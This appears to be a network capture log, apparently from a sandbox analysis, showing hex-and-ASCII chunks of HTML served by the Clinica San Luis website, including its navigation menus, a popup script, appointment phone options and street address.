2023-03-22 04:44:36 UTC	188	IN	Data Raw: 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 Data Ascii: clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"
2023-03-22 04:44:36 UTC	190	IN	Data Raw: 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d Data Ascii: item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-
2023-03-22 04:44:36 UTC	191	IN	Data Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 Data Ascii: g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-containe
2023-03-22 04:44:36 UTC	192	IN	Data Raw: 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 Data Ascii: /nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-ite
2023-03-22 04:44:36 UTC	194	IN	Data Raw: 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 Data Ascii: enu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-drop
2023-03-22 04:44:36 UTC	195	IN	Data Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 Data Ascii: ass="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu
2023-03-22 04:44:36 UTC	196	IN	Data Raw: 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 Data Ascii: t"><span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><s
2023-03-22 04:44:36 UTC	198	IN	Data Raw: 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f Data Ascii: -item-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-co
2023-03-22 04:44:36 UTC	199	IN	Data Raw: 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a Data Ascii: pan></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a>
2023-03-22 04:44:36 UTC	200	IN	Data Raw: 7a 61 20 64 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 Data Ascii: za del maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.1
2023-03-22 04:44:36 UTC	202	IN	Data Raw: 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 Data Ascii: t: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeCli
2023-03-22 04:44:36 UTC	203	IN	Data Raw: 3b 0d 0a 09 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c Data Ascii: ;refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><
2023-03-22 04:44:36 UTC	204	IN	Data Raw: 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c Data Ascii: v class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div cl
2023-03-22 04:44:36 UTC	206	IN	Data Raw: 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 Data Ascii: hone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-a
2023-03-22 04:44:36 UTC	207	IN	Data Raw: 2f 61 70 6f 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 Data Ascii: /apoyo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></di
2023-03-22 04:44:36 UTC	208	IN	Data Raw: 75 6e 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 Data Ascii: unacin</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoi
2023-03-22 04:44:36 UTC	210	IN	Data Raw: 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f Data Ascii: ass="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></
2023-03-22 04:44:36 UTC	211	IN	Data Raw: 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 Data Ascii: mail protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</b
2023-03-22 04:44:36 UTC	212	IN	Data Raw: 74 6c 65 22 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 Data Ascii: tle">Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-la
2023-03-22 04:44:36 UTC	214	IN	Data Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 Data Ascii: ></div></div></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home
